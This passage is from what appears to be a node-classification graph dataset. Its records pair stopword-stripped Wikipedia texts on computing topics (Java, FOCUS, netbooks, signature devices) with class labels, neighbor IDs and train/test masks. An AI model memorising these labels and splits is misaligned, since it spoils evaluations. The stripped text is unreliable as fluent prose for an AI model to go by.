    "text": "Secure_signature_creation_device:secure signature creation device secure signature creation device specific type computer hardware software used creating electronic signature put service secure signature creation device sscd device must meet rigorous requirements laid annex ii regulation eu 910/2014 eidas referred qualified electronic signature creation device qscd using secure signature creation devices helps facilitating online business processes save time money transactions made within public private sectors minimum requirements must met elevate electronic signature creation device level secure signature creation device provided annex ii eidas appropriate procedural technical means device must reasonably assure confidentiality data used create electronic signature must ensure data used create electronic signature unique used lastly shall allow qualified trust service provider certificate authority create manage signatory ’ electronic signature data ensure security signature creation data used sscd create electronic signature must provide reasonable protection current technology prevent forgery duplication signature creation data must remain sole control signatory prevent unauthorized use sscd prohibited altering signature ’ accompanying data trust service provider certificate authority places sscd service must securely prepare device according annex ii eidas fully compliance following three conditions secure signature creation device must also meet international standard computer security certification referred common criteria information technology security evaluation iso/iec 15408 standard gives computer system users ability specify security requirements via protection profiles pps security functional requirements sfrs security assurance requirements sars trust service provider certificate authority required implement specified requirements attest product ’ security attributes third-party testing laboratory evaluates device ensure level security claimed provider secure signature creation device used part central authentication service cas may act cas server multi-tier authentication scenarios cas software protocol allows users authenticated signing web application common scheme cas protocol includes client ’ web browser application requesting authentication cas server authentication needed application send request cas server server compare user ’ credentials database information matches cas respond user authenticated eidas provided tiered approach determining legal implications electronic signatures signature created secure signature creation device considered strongest probative value document message signed device non-reputable meaning signatory deny responsible creation signature regulation eu 910/2014 eidas evolved directive 1999/93/ec electronic signatures directive intent directive make eu member states responsible creating legislation would allow creation european union ’ electronic signing system eidas regulation required member states follow specifications electronic signatures effective date 1 july 2016",
    "neighbors": [
      3264,
      7075,
      517,
      8904,
      9576,
      5200,
      8018,
      1496
    ],
    "mask": "Test"
  },
  {
    "node_id": 5675,
    "label": 4,
    "text": "FraudWatch_International:fraudwatch international fraudwatch international internet security organization founded 2003 mainly specializes online fraud protection anti-phishing activities headquarters privately owned company melbourne australia offices london dubai san francisco ceo trent youl activities company include anti-phishing protection malware online brand protection offering security service companies fraudwatch international active sponsoring participating congresses cybercrime also sponsors anti-phishing working group techniques used fraudwatch international include anti-phishing company released fwi fraud shield 2007 application windows platforms warns users browse phishing websites",
    "neighbors": [
      4945,
      1899,
      10915
    ],
    "mask": "Train"
  },
  {
    "node_id": 5676,
    "label": 9,
    "text": "Andrey_Ershov:andrey ershov academician andrey petrovych ershov 19 april 1931 moscow – 8 december 1988 moscow soviet computer scientist notable pioneer systems programming programming language research donald knuth considers independently co-discovered idea hashing linear probing also created one first algorithms compiling arithmetic expressions responsible languages alpha rapira aist-0 first soviet time-sharing system electronic publishing system rubin mramor multiprocessing workstation also initiator developing computer bank russian language soviet project creating large representative russian corpus project 1980s comparable bank english british national corpus russian national corpus created russian academy sciences 2000s successor ershov project 1959 worked siberian division ussr academy sciences helped found novosibirsk computer center siberian school computer science received academy sciences first programmer recognized 1974 made distinguished fellow british computer society 1981 received silver core award ifip computer science community mostly known speech aesthetics human factor programming presented dinner afips spring joint computer conference 1972 due importance republished article communications acm",
    "neighbors": [
      8262,
      1611,
      2798,
      7599,
      1783
    ],
    "mask": "Train"
  },
  {
    "node_id": 5677,
    "label": 9,
    "text": "Java_(programming_language):java programming language java general-purpose programming language class-based object-oriented although pure object-oriented language contains primitive types designed implementation dependencies possible intended let application developers write run anywhere wora meaning compiled java code run platforms support java without need recompilation java applications typically compiled bytecode run java virtual machine jvm regardless underlying computer architecture syntax java similar c c++ fewer low-level facilities either java one popular programming languages use according github particularly client-server web applications reported 9 million developers java originally developed james gosling sun microsystems since acquired oracle released 1995 core component sun microsystems java platform original reference implementation java compilers virtual machines class libraries originally released sun proprietary licenses may 2007 compliance specifications java community process sun relicensed java technologies gnu general public license meanwhile others developed alternative implementations sun technologies gnu compiler java bytecode compiler gnu classpath standard libraries icedtea-web browser plugin applets latest versions java 12 released march 2019 java 11 currently supported long-term support lts version released september 25 2018 oracle released legacy java 8 lts last free public update january 2019 commercial use otherwise still support java 8 public updates personal use least december 2020 oracle others highly recommend uninstall older versions java serious risks due unresolved security issues since java 9 10 longer supported oracle advises users immediately transition java 11 java 12 also non-lts option james gosling mike sheridan patrick naughton initiated java language project june 1991 java originally designed interactive television advanced digital cable television industry time language initially called oak oak tree stood outside gosling office later project went name green finally renamed java java coffee gosling designed java c/c++-style syntax system application programmers would find familiar sun microsystems released first public implementation java 1.0 1996 promised write run anywhere wora providing no-cost run-times popular platforms fairly secure featuring configurable security allowed network- file-access restrictions major web browsers soon incorporated ability run java applets within web pages java quickly became popular java 1.0 compiler re-written java arthur van hoff comply strictly java 1.0 language specification advent java 2 released initially j2se 1.2 december 1998 1999 new versions multiple configurations built different types platforms j2ee included technologies apis enterprise applications typically run server environments j2me featured apis optimized mobile applications desktop version renamed j2se 2006 marketing purposes sun renamed new j2 versions java ee java java se respectively 1997 sun microsystems approached iso/iec jtc 1 standards body later ecma international formalize java soon withdrew process java remains de facto standard controlled java community process one time sun made java implementations available without charge despite proprietary software status sun generated revenue java selling licenses specialized products java enterprise system november 13 2006 sun released much java virtual machine jvm free open-source software foss terms gnu general public license gpl may 8 2007 sun finished process making jvm core code available free software/open-source distribution terms aside small portion code sun hold copyright sun vice-president rich green said sun ideal role regard java evangelist following oracle corporation acquisition sun micro-systems 2009–10 oracle described steward java technology relentless commitment fostering community participation transparency prevent oracle filing lawsuit google shortly using java inside android sdk see google section java software runs everything laptops data centers game consoles scientific supercomputers april 2 2010 james gosling resigned oracle january 2016 oracle announced java run-time environments based jdk 9 discontinue browser plugin five primary goals creation java language java 8 supported java 8 11 long term support lts versions major release versions java along release dates sun defined supports four editions java targeting different application environments segmented many apis belong one platforms platforms classes java apis organized separate groups called packages package contains set related interfaces classes exceptions refer separate platforms description packages available sun also provided edition called personal java superseded later standards-based java configuration-profile pairings one design goal java portability means programs written java platform must run similarly combination hardware operating system adequate run time support achieved compiling java language code intermediate representation called java bytecode instead directly architecture-specific machine code java bytecode instructions analogous machine code intended executed virtual machine vm written specifically host hardware end users commonly use java runtime environment jre installed machine standalone java applications web browser java applets standard libraries provide generic way access host-specific features graphics threading networking use universal bytecode makes porting simple however overhead interpreting bytecode machine instructions made interpreted programs almost always run slowly native executables just-in-time jit compilers compile byte-codes machine code runtime introduced early stage java platform-independent adapted particular platform run java virtual machine translates java bytecode platform machine language programs written java reputation slower requiring memory written c++ however java programs execution speed improved significantly introduction just-in-time compilation 1997/1998 java 1.1 addition language features supporting better code analysis inner classes stringbuilder class optional assertions etc optimizations java virtual machine hotspot becoming default sun jvm 2000 java 1.5 performance improved addition java.util.concurrent package including lock free implementations concurrentmaps multi-core collections improved java 1.6 platforms offer direct hardware support java micro controllers run java bytecode hardware instead software java virtual machine arm-based processors could hardware support executing java bytecode jazelle option though support mostly dropped current implementations arm java uses automatic garbage collector manage memory object lifecycle programmer determines objects created java runtime responsible recovering memory objects longer use references object remain unreachable memory becomes eligible freed automatically garbage collector something similar memory leak may still occur programmer code holds reference object longer needed typically objects longer needed stored containers still use methods non-existent object called null pointer exception thrown one ideas behind java automatic memory management model programmers spared burden perform manual memory management languages memory creation objects implicitly allocated stack explicitly allocated deallocated heap latter case responsibility managing memory resides programmer program deallocate object memory leak occurs program attempts access deallocate memory already deallocated result undefined difficult predict program likely become unstable crash partially remedied use smart pointers add overhead complexity note garbage collection prevent logical memory leaks i.e memory still referenced never used garbage collection may happen time ideally occur program idle guaranteed triggered insufficient free memory heap allocate new object cause program stall momentarily explicit memory management possible java java support c/c++ style pointer arithmetic object addresses arithmetically manipulated e.g adding subtracting offset allows garbage collector relocate referenced objects ensures type safety security c++ object-oriented languages variables java primitive data types either stored directly fields objects stack methods rather heap commonly true non-primitive data types see escape analysis conscious decision java designers performance reasons java contains multiple types garbage collectors default hotspot uses parallel scavenge garbage collector however also several garbage collectors used manage heap 90 applications java concurrent mark-sweep cms garbage collector sufficient oracle aims replace cms garbage-first collector g1 solved memory management problem relieve programmer burden handling properly kind resources like network database connections file handles etc. especially presence exceptions paradoxically presence garbage collector faded necessity explicit destructor method classes thus rendering management resources difficult syntax java largely influenced c++ unlike c++ combines syntax structured generic object-oriented programming java built almost exclusively object-oriented language code written inside classes every data item object exception primitive data types i.e integers floating-point numbers boolean values characters objects performance reasons java reuses popular aspects c++ method unlike c++ java support operator overloading multiple inheritance classes though multiple inheritance supported interfaces java uses comments similar c++ three different styles comments single line style marked two slashes codice_1 multiple line style opened codice_2 closed codice_3 javadoc commenting style opened codice_4 closed codice_3 javadoc style commenting allows user run javadoc executable create documentation program read integrated development environments ides eclipse allow developers access documentation within ide traditional hello world program written java source files must named public class contain appending suffix codice_6 example codice_7 must first compiled bytecode using java compiler producing file named codice_8 executed launched java source file may contain one public class contain multiple classes public access modifier number public inner classes source file contains multiple classes make one class introduced codice_9 keyword public preceded codice_10 keyword name source file public class name class declared public may stored .java file compiler generate class file class defined source file name class file name class .class appended class file generation anonymous classes treated name concatenation name enclosing class integer keyword codice_10 denotes method called code classes class may used classes outside class hierarchy class hierarchy related name directory .java file located called access level modifier access level modifiers include keywords codice_12 codice_13 keyword codice_14 front method indicates static method associated class specific instance class static methods invoked without reference object static methods access class members also static methods designated static instance methods require specific instance class operate keyword codice_15 indicates main method return value caller java program exit error code must call system.exit explicitly method name codice_16 keyword java language simply name method java launcher calls pass control program java classes run managed environments applets enterprise javabeans use need codice_17 method java program may contain multiple classes codice_16 methods means vm needs explicitly told class launch main method must accept array objects convention referenced codice_19 although legal identifier name used since java 5 main method also use variable arguments form codice_20 allowing main method invoked arbitrary number codice_21 arguments effect alternate declaration semantically identical codice_19 parameter still array codice_21 objects allows alternative syntax creating passing array java launcher launches java loading given class specified command line attribute jar starting codice_24 method stand-alone programs must declare method explicitly codice_25 parameter array objects containing arguments passed class parameters codice_16 often passed means command line printing part java standard library class defines public static field called codice_27 object instance class provides many methods printing data standard including also appends new line passed string string codice_28 automatically converted string object compiler java applets programs embedded applications typically web page displayed web browser java applet api deprecated since java 9 2017 java servlet technology provides web developers simple consistent mechanism extending functionality web server accessing existing business systems servlets server-side java ee components generate responses typically html pages requests typically http requests clients java servlet api extent superseded two standard java technologies web services javaserver pages jsp server-side java ee components generate responses typically html pages http requests clients jsps embed java code html page using special delimiters codice_29 codice_30 jsp compiled java servlet java application right first time accessed generated servlet creates response swing graphical user interface library java se platform possible specify different look feel pluggable look feel system swing clones windows gtk+ motif supplied sun apple also provides aqua look feel macos prior implementations looks feels may considered lacking swing java se 6 addresses problem using native gui widget drawing routines underlying platforms javafx software platform creating delivering desktop applications well rich internet applications rias run across wide variety devices javafx intended replace swing standard gui library java se included foreseeable future javafx support desktop computers web browsers microsoft windows linux macos javafx support native os look feels 2004 generics added java language part j2se 5.0 prior introduction generics variable declaration specific type container classes example problem easy way create container accepts specific types objects either container operates subtypes class interface usually codice_31 different container class created contained class generics allow compile-time type checking without create many container classes containing almost identical code addition enabling efficient code certain runtime exceptions prevented occurring issuing compile-time errors java prevented runtime type errors codice_32 occurring would type safe 2016 type system java proven unsound criticisms directed java include implementation generics speed handling unsigned numbers implementation floating-point arithmetic history security vulnerabilities primary java vm implementation hotspot java class library standard library developed support application development java controlled sun microsystems cooperation others java community process program companies individuals participating process influence design development apis process subject controversy 2010 class library contains features javadoc comprehensive documentation system created sun microsystems used many java developers provides developers organized system documenting code javadoc comments extra asterisk beginning i.e delimiters codice_4 codice_3 whereas normal multi-line comments java set delimiters codice_2 codice_3 oracle corporation current owner official implementation java se platform following acquisition sun microsystems january 27 2010 implementation based original implementation java sun oracle implementation available microsoft windows still works xp later versions currently officially supported macos linux solaris java lacks formal standardization recognized ecma international iso/iec ansi third-party standards organization oracle implementation de facto standard oracle implementation packaged two different distributions java runtime environment jre contains parts java se platform required run java programs intended end users java development kit jdk intended software developers includes development tools java compiler javadoc jar debugger oracle also released graalvm high performance java dynamic compiler interpreter openjdk another notable java se implementation licensed gnu gpl implementation started sun began releasing java source code gpl java se 7 openjdk official java reference implementation goal java make implementations java compatible historically sun trademark license usage java brand insists implementations compatible resulted legal dispute microsoft sun claimed microsoft implementation support rmi jni added platform-specific features sun sued 1997 2001 settlement us 20 million well court order enforcing terms license sun result microsoft longer ships java windows platform-independent java essential java ee even rigorous validation required certify implementation environment enables portable server-side applications java programming language requires presence software platform order compiled programs executed oracle supplies java platform use java android sdk alternative software platform used primarily developing android applications gui system java language key pillar android open source mobile operating system although android built linux kernel written largely c android sdk uses java language basis android applications bytecode language supported android sdk incompatible java bytecode runs virtual machine optimized low-memory devices smartphones tablet computers depending android version bytecode either interpreted dalvik virtual machine compiled native code android runtime android provide full java se standard library although android sdk include independent implementation large subset supports java 6 java 7 features offering implementation compatible standard library apache harmony use java-related technology android led legal dispute oracle google may 7 2012 san francisco jury found apis could copyrighted google infringed oracle copyrights use java android devices district judge william haskell alsup ruled may 31 2012 apis copyrighted reversed united states court appeals federal circuit may 2014 may 26 2016 district court decided favor google ruling copyright infringement java api android constitutes fair use march 2018 ruling overturned appeals court sent case determining damages federal court san francisco google filed petition writ certiorari supreme court united states january 2019 challenge two rulings made appeals court towards oracle favor",
    "neighbors": [
      6144,
      6145,
      4101,
      6153,
      6154,
      2059,
      8201,
      10250,
      2062,
      16,
      4112,
      6160,
      19,
      6161,
      8213,
      8217,
      10266,
      8219,
      2076,
      6172,
      8221,
      10271,
      6176,
      8226,
      50,
      2105,
      58,
      2106,
      4155,
      8251,
      8252,
      6212,
      69,
      4166,
      8262,
      72,
      4171,
      6219,
      6228,
      8280,
      8281,
      8285,
      8289,
      2146,
      6242,
      10340,
      4197,
      4198,
      4200,
      8297,
      2154,
      10345,
      4205,
      8303,
      8304,
      113,
      2163,
      2168,
      10366,
      6271,
      130,
      6277,
      6278,
      10373,
      10377,
      2186,
      4235,
      10387,
      148,
      10393,
      155,
      10395,
      2205,
      4255,
      161,
      8353,
      2217,
      4267,
      10413,
      6322,
      10421,
      6328,
      2234,
      187,
      190,
      6334,
      8385,
      6338,
      10435,
      196,
      6341,
      10436,
      6345,
      206,
      10447,
      2259,
      8408,
      6361,
      219,
      220,
      2269,
      8413,
      8414,
      10460,
      10465,
      228,
      10470,
      231,
      4327,
      2281,
      8425,
      10474,
      10478,
      10481,
      242,
      8434,
      4341,
      10486,
      2296,
      2297,
      256,
      2304,
      4352,
      4358,
      8455,
      10503,
      10506,
      2315,
      8460,
      10507,
      270,
      10509,
      10510,
      10511,
      280,
      8473,
      4379,
      8476,
      10525,
      10526,
      8479,
      288,
      6433,
      6437,
      4390,
      8486,
      4392,
      10537,
      2351,
      8495,
      305,
      10547,
      8502,
      10553,
      4410,
      6458,
      10559,
      10560,
      4419,
      4421,
      2374,
      8520,
      10568,
      332,
      333,
      8524,
      10573,
      10576,
      2387,
      6483,
      8531,
      10581,
      10586,
      8539,
      348,
      349,
      2401,
      356,
      4452,
      6502,
      8549,
      8554,
      363,
      2416,
      370,
      10611,
      4473,
      10617,
      379,
      380,
      386,
      8582,
      2442,
      4490,
      8587,
      2450,
      8597,
      8598,
      10645,
      2457,
      10649,
      4507,
      6555,
      10654,
      416,
      8609,
      4519,
      8618,
      428,
      10670,
      2481,
      8626,
      435,
      6579,
      437,
      6581,
      8630,
      4538,
      10683,
      10684,
      6589,
      8637,
      2496,
      8644,
      10693,
      4550,
      8647,
      4558,
      463,
      2519,
      4572,
      477,
      479,
      10719,
      2529,
      8677,
      10732,
      494,
      4592,
      4593,
      502,
      2556,
      2557,
      508,
      2558,
      8702,
      10752,
      515,
      8719,
      2576,
      8720,
      4630,
      8728,
      541,
      545,
      546,
      8738,
      10789,
      6694,
      2603,
      10798,
      6705,
      566,
      4663,
      2617,
      2619,
      572,
      2620,
      6718,
      8771,
      10819,
      10824,
      587,
      4685,
      10829,
      10831,
      4688,
      597,
      10841,
      6748,
      8799,
      2658,
      10851,
      10854,
      10857,
      2666,
      6763,
      8810,
      6767,
      6775,
      632,
      2680,
      4728,
      8825,
      10873,
      4740,
      645,
      6791,
      4746,
      4747,
      6797,
      655,
      6800,
      10900,
      2710,
      8854,
      6810,
      8860,
      8863,
      673,
      8866,
      6819,
      8868,
      6822,
      2727,
      4775,
      4777,
      8870,
      8871,
      6828,
      10921,
      10927,
      690,
      692,
      4797,
      2757,
      712,
      10953,
      8907,
      716,
      6860,
      6862,
      8909,
      10961,
      8916,
      10964,
      4822,
      2777,
      8921,
      6875,
      10971,
      741,
      4840,
      747,
      2795,
      8940,
      10991,
      8947,
      2804,
      4854,
      2808,
      8957,
      6910,
      769,
      11009,
      2819,
      11017,
      2828,
      8973,
      11024,
      788,
      6938,
      8986,
      798,
      6943,
      8990,
      11038,
      8994,
      2852,
      805,
      2864,
      9010,
      9011,
      820,
      9012,
      823,
      4919,
      2875,
      11079,
      11082,
      11085,
      846,
      847,
      2895,
      4944,
      2903,
      9050,
      11098,
      862,
      863,
      4960,
      2914,
      9063,
      7018,
      7022,
      7026,
      4980,
      4982,
      9078,
      7032,
      11134,
      7045,
      4998,
      7053,
      910,
      9103,
      11161,
      7067,
      2978,
      7076,
      9124,
      5031,
      9128,
      937,
      5037,
      11184,
      9138,
      5044,
      5047,
      5048,
      9144,
      7098,
      7100,
      7104,
      963,
      3013,
      5067,
      11212,
      11218,
      11219,
      11221,
      9177,
      986,
      9179,
      11227,
      3039,
      992,
      993,
      7143,
      7144,
      7146,
      3051,
      5100,
      7147,
      7148,
      11242,
      7152,
      11248,
      11252,
      7157,
      7158,
      7159,
      1016,
      11257,
      1018,
      9211,
      11260,
      5117,
      3076,
      11269,
      11271,
      7176,
      7177,
      1034,
      9224,
      1036,
      1041,
      7186,
      1047,
      3097,
      9244,
      9245,
      11294,
      11296,
      7204,
      11303,
      9256,
      11307,
      1069,
      5165,
      11309,
      5170,
      11317,
      7223,
      1083,
      9280,
      7233,
      9281,
      7235,
      1095,
      3144,
      1101,
      7246,
      5199,
      3152,
      9297,
      5205,
      3159,
      3160,
      7256,
      11354,
      7261,
      5214,
      11359,
      7267,
      5220,
      11363,
      5223,
      1128,
      7273,
      1130,
      3178,
      5228,
      7274,
      9320,
      9327,
      1136,
      11371,
      9330,
      9331,
      9333,
      5238,
      7288,
      1146,
      11386,
      7292,
      7293,
      11389,
      9343,
      11391,
      9345,
      11393,
      1156,
      5255,
      3209,
      7307,
      11403,
      1165,
      5262,
      11408,
      7315,
      11411,
      1178,
      3230,
      7326,
      9376,
      1185,
      9385,
      3247,
      1203,
      7347,
      9395,
      1206,
      11451,
      7357,
      5314,
      1222,
      5323,
      7374,
      9424,
      1235,
      3285,
      7392,
      9441,
      1250,
      3299,
      11490,
      9445,
      7398,
      1255,
      1258,
      5354,
      3310,
      11506,
      11509,
      5369,
      5370,
      3323,
      7421,
      9471,
      3328,
      7427,
      7428,
      11528,
      3341,
      1294,
      9487,
      1296,
      5395,
      9491,
      1301,
      11541,
      1304,
      1306,
      5403,
      5406,
      11552,
      1316,
      7462,
      5420,
      1325,
      1327,
      7472,
      9519,
      7475,
      1332,
      5429,
      1335,
      5431,
      7479,
      7485,
      1343,
      1347,
      1348,
      1349,
      7494,
      5450,
      1358,
      3409,
      1363,
      3413,
      3414,
      5463,
      9561,
      11610,
      5467,
      11614,
      5471,
      1376,
      1379,
      1384,
      11625,
      11626,
      3435,
      5483,
      9579,
      7537,
      3442,
      9589,
      9590,
      1399,
      7547,
      7548,
      7550,
      5508,
      5509,
      3462,
      11655,
      9610,
      11661,
      5521,
      5522,
      1427,
      7571,
      1429,
      11674,
      1435,
      9631,
      11680,
      1447,
      11688,
      5546,
      7595,
      1459,
      7609,
      3517,
      3518,
      3519,
      5567,
      9665,
      9671,
      1480,
      3529,
      7629,
      5588,
      3545,
      5603,
      5604,
      9701,
      3558,
      3560,
      3561,
      3562,
      5609,
      1516,
      5612,
      5613,
      7656,
      7664,
      9714,
      3571,
      1524,
      5620,
      7671,
      3577,
      5627,
      1533,
      3582,
      5634,
      1539,
      3587,
      5637,
      9730,
      9731,
      9734,
      7691,
      1549,
      3600,
      1556,
      3604,
      7700,
      3609,
      5660,
      1565,
      3613,
      5666,
      3624,
      1578,
      1579,
      3626,
      7722,
      1584,
      7728,
      5684,
      9780,
      7734,
      1591,
      9783,
      1594,
      9786,
      9789,
      7742,
      9794,
      9796,
      7750,
      1611,
      1613,
      3664,
      3667,
      9815,
      5723,
      7775,
      7779,
      1636,
      9828,
      9831,
      5743,
      5751,
      9848,
      3705,
      5754,
      3710,
      3712,
      1666,
      1670,
      5768,
      1673,
      7816,
      7822,
      9871,
      1683,
      9875,
      3733,
      3734,
      5783,
      9877,
      1689,
      7835,
      1707,
      7851,
      3761,
      7857,
      9914,
      5819,
      7871,
      5824,
      1730,
      5830,
      3784,
      5833,
      9932,
      7889,
      1747,
      7894,
      1755,
      5851,
      9949,
      9955,
      9964,
      5872,
      1780,
      3833,
      7930,
      5892,
      9988,
      1801,
      3853,
      1808,
      1809,
      1813,
      5910,
      1816,
      10009,
      10011,
      5917,
      3871,
      5921,
      1826,
      3876,
      3877,
      3878,
      3881,
      5929,
      1836,
      5933,
      7981,
      10033,
      3895,
      5943,
      5945,
      1851,
      3900,
      10043,
      10045,
      8002,
      3907,
      3909,
      10053,
      5961,
      10059,
      8013,
      3918,
      3920,
      8016,
      8019,
      10068,
      5987,
      3940,
      1894,
      10088,
      10090,
      10097,
      1910,
      3960,
      1913,
      8057,
      3966,
      6015,
      6016,
      3969,
      1931,
      8079,
      10129,
      8082,
      3990,
      6039,
      10143,
      1952,
      4000,
      8096,
      10145,
      10146,
      4006,
      1959,
      1960,
      6057,
      8108,
      6061,
      6067,
      4020,
      4024,
      6074,
      8122,
      4031,
      1991,
      4042,
      8139,
      8140,
      10187,
      2001,
      2002,
      8147,
      10193,
      8149,
      6102,
      10200,
      4057,
      2010,
      2011,
      4058,
      6107,
      8158,
      4069,
      6119,
      2029,
      8179,
      2038,
      6135,
      8188,
      2045,
      6142,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 5678,
    "label": 9,
    "text": "FOCUS:focus focus fourth-generation programming language 4gl computer programming language development environment used build database queries produced information builders inc. originally developed data handling analysis ibm mainframe subsequently versions minicomputers vax platforms implemented focus later extended personal computers 1997 world wide web webfocus product information builders focus product began alternate product mathematica ramis first fourth-generation_programming_language 4gl national css ncss time-sharing vendor licensed rights make ramis available vp/css system point mathematica changed licensing price interested parties ramis direct ancestor focus gerald d. cohen peter mittelman principal developers ramis working mathematica products group 1970 ramis licensed mathematica number in-house clients including nabisco corporation also offered national css timesharing company october 1975 cohen left mathematica formed information builders recreated product built mathematica form focus similar ramis bugs misspelled error messages syntax focus simplest elements almost direct clone syntax ramis bearing resemblance similar differences various early dialects sql time ncss decided work product later called nomad three products flourished 1970s early 1980s focus also offered time-sharing basis via tymeshare mathematica time ran mid-80s ncss also failed victim personal computing revolution obviated commercial timesharing ramis sold series companies ultimately landing computer associates nomad suffered similar fate focus cohen direction continued flourish expanding product line loosely competitive sas focus never quite reached degree mainstream adoption perhaps basic analytical statistical functions lacked wide array specialized analytic tools made sas standard fields pharmaceutical clinical trials instead focus concentrated extreme flexibility data import export well ad hoc end-user reporting software packages focus linked integrated include business intelligence software competitors include although focus resembles data access analysis tools sql sas also includes report chart display presentation features automates process identifying files operating system opening input file reading next record opening output file writing next record closing files basic operation allows user/programmer concentrate details working data within record effect working almost entirely within implicit program loop runs record somewhat like rpg report program generator procedures operate dataset whole instance printing statistical analysis merely require user/programmer identify dataset compared general-purpose programming languages structure allows user/programmer less familiar technical details data stored relatively familiar information contained data blurs line user programmer appealing individuals whose work roles business research rather information technology turn double edged result allowing rapid answers business research questions even ones requiring several iterations get initial results final answer also contribute construction large body poorly written and/or difficult maintain source code feature unique time focus features ability user construct data description file called master file description referring actual data file even several different data description files addressing data file different ways rather usual practice file structure hard-coded program way files structure source accessed produced many different ways eliminating much data manipulation example concatenation parsing times required earlier programming languages instance actual data file accessed read write record 80 byte text string 40 2 character numerical fields 10 8-byte floating point numbers etc. user simply re-writing appropriate master file description needed second command would produce report headings custname custid projname projcost keywords facilitate modification deletion existing data prompting error messages interactive session customized 1997 web-based version focus introduced called webfocus built data access reporting foundation focus expanding visually oriented thin-client paradigm accessible web browser webfocus language procedural non-procedural command structure former immediate execution whereas latter placed stack memory later execution",
    "neighbors": [
      11075,
      8262,
      4042,
      10413,
      7983,
      7217,
      10803,
      11604,
      2901,
      119,
      8312,
      313,
      284,
      8509,
      3358,
      2652
    ],
    "mask": "None"
  },
  {
    "node_id": 5679,
    "label": 9,
    "text": "EC_(programming_language):ec programming language ec ecere c object-oriented programming language defined super-set c language ec initially developed part ecere cross-platform software development kit sdk project goals language provide object-oriented constructs reflection properties dynamic modules top c language maintaining c compatibility optimal native performance ec currently relies gcc clang perform final steps compilation using c intermediate language however plans integrate directly llvm skip intermediate c files ec available part codice_1 package debian/ubuntu derived linux distributions windows installer also bundling mingw-w64 available main website free open-source sdk including ec compiler also built number platforms including os x freebsd android also possible deploy ec applications web compiling javascript emscripten webassembly binaryen hello world program ec class helloapp application hello world program programmed gui import ecere class helloform window helloform hello",
    "neighbors": [
      1952,
      9345,
      3613,
      3462,
      8262,
      5961,
      8554,
      11625,
      5612,
      6797,
      7983,
      10703,
      119,
      823,
      2138,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 5680,
    "label": 9,
    "text": "Synchronous_programming_language:synchronous programming language synchronous programming language computer programming language optimized programming reactive systems computer systems sorted three main classes 1 transformational systems take inputs process deliver outputs terminate execution typical example compiler 2 interactive systems interact continuously environment speed typical example web 3 reactive systems interact continuously environment speed imposed environment typical example automatic flight control system modern airplanes reactive systems must therefore react stimuli environment within strict time bounds reason often also called real-time systems found often embedded systems synchronous programming also synchronous reactive programming srp computer programming paradigm supported synchronous programming languages principle srp make abstraction programming languages synchronous abstraction digital circuits synchronous circuits indeed designed high-level abstraction timing characteristics electronic transistors neglected gate circuit ... therefore assumed compute result instantaneously wire assumed transmit signal instantaneously synchronous circuit clocked tick clock computes instantaneously output values new values memory cells latches input values current values memory cells words circuit behaves electrons flowing infinitely fast first synchronous programming languages invented france 1980s esterel lustre signal since many synchronous languages emerged synchronous abstraction makes reasoning time synchronous program lot easier thanks notion logical ticks synchronous program reacts environment sequence ticks computations within tick assumed instantaneous i.e. processor executing infinitely fast statement a||b therefore abstracted package ab b simultaneous take concrete example esterel statement every 60 second emit minute specifies signal minute exactly synchronous 60-th occurrence signal second fundamental level synchronous abstraction eliminates non-determinism resulting interleaving concurrent behaviors allows deterministic semantics therefore making synchronous programs amenable formal analysis verification certified code generation usable formal specification formalisms contrast asynchronous model computation sequential processor statement a||b either implemented b b known interleaving-based non determinism drawback asynchronous model intrinsically forbids deterministic semantics e.g. race conditions makes formal reasoning analysis verification complex nonetheless asynchronous formalisms useful model design verify distributed systems intrinsically asynchronous also contrast systems processes basically interact synchronously example would systems built based communicating sequential processes csp model also allows nondeterministic choice",
    "neighbors": [
      9345,
      2691,
      7172,
      9224,
      7308,
      5395,
      5651,
      9366,
      5527,
      9626,
      3613,
      4770,
      3876,
      7341,
      4782,
      9780,
      1591,
      4410,
      191,
      10819,
      8262,
      9926,
      4042,
      5845,
      7421,
      477,
      7395,
      4838,
      9330,
      9331,
      2556,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5681,
    "label": 7,
    "text": "Netbook:netbook netbook generic name given category small lightweight legacy-free inexpensive laptop computers introduced 2007 netbooks compete market segment mobiles chromebooks variation portable network computer inception late 2007 smaller notebooks optimized low weight low cost—netbooks omitted certain features e.g. optical drive featured smaller screens keyboards offered reduced computing power compared full-sized laptop course evolution netbooks ranged size 5 screen diagonal 12 typical weight often significantly less expensive laptops mid-2009 netbooks began offered wireless data carriers users free charge extended service contract purchase short period since appearance netbooks grew size features converged smaller lighter laptops subnotebooks august 2009 comparing dell netbook dell notebook cnet called netbooks nothing smaller cheaper notebooks noting specs similar average shopper would likely confused one better conclusion really distinction devices attempt prevent cannibalizing lucrative laptops lineup manufacturers imposed several constraints netbooks however would soon push netbooks niche distinctive advantages traditional laptops tablet computers see 2011 increasing popularity tablet computers particularly ipad —a different form factor improved computing capabilities lower production cost—had led decline netbook sales high end performance spectrum ultrabooks ultra-light portables traditional keyboard display revolutionized 11.6-inch macbook air made fewer performance sacrifices albeit considerably higher production cost capitalizing success macbook air response intel promoted ultrabook new high-mobility standard hailed analysts succeeding netbooks failed result two developments netbooks 2011 kept price strong point losing design ease-of-use portability department tablets tablets removable keyboards ultrabook laptops features performance field many major netbook producing companies stopped producing end 2012 many netbook products replaced market chromebooks variation network computer concept form netbook hp re-entered non-chromebook netbook market stream 11 2014 origins netbook traced highly popular toshiba range libretto sub-notebooks 6 libretto 20 dates back early 1996 weighed 840g apple also line powerbook duos ultra-portable macintosh laptops mid 90s recently psion now-discontinued netbook line olpc xo-1 initially called us 100 laptop palm foleo small portable network-enabled computers generic use term netbook however began 2007 asus unveiled asus eee pc originally designed emerging markets device weighed featured display keyboard approximately 85 size normal keyboard solid-state drive custom version linux simplified user interface geared towards netbook use following eee pc everex launched linux-based cloudbook windows xp windows vista models also introduced msi released wind—others soon followed suit olpc project followed market goals laid emate 300 eight years earlier known innovation producing durable cost- power-efficient netbook developing countries regarded one major factors led top computer hardware manufacturers begin creating low-cost netbooks consumer market first asus eee pc sold 300,000 units four months companies dell acer took note began producing inexpensive netbooks olpc xo-1 targets different audience manufacturers netbooks appears olpc facing competition developing countries large choice vendors choose low-cost netbook prefer late 2008 netbooks begun take market share away notebooks contrast earlier largely failed attempts establish mini computers new class mainstream personal computing devices built around comparatively expensive platforms requiring proprietary software applications imposing severe usability limitations recent success netbooks also attributed fact pc technology matured enough allow truly cost optimized implementations enough performance suit needs majority pc users illustrated fact typical system performance netbook level mainstream pc 2001 around one quarter cost performance level suffices user 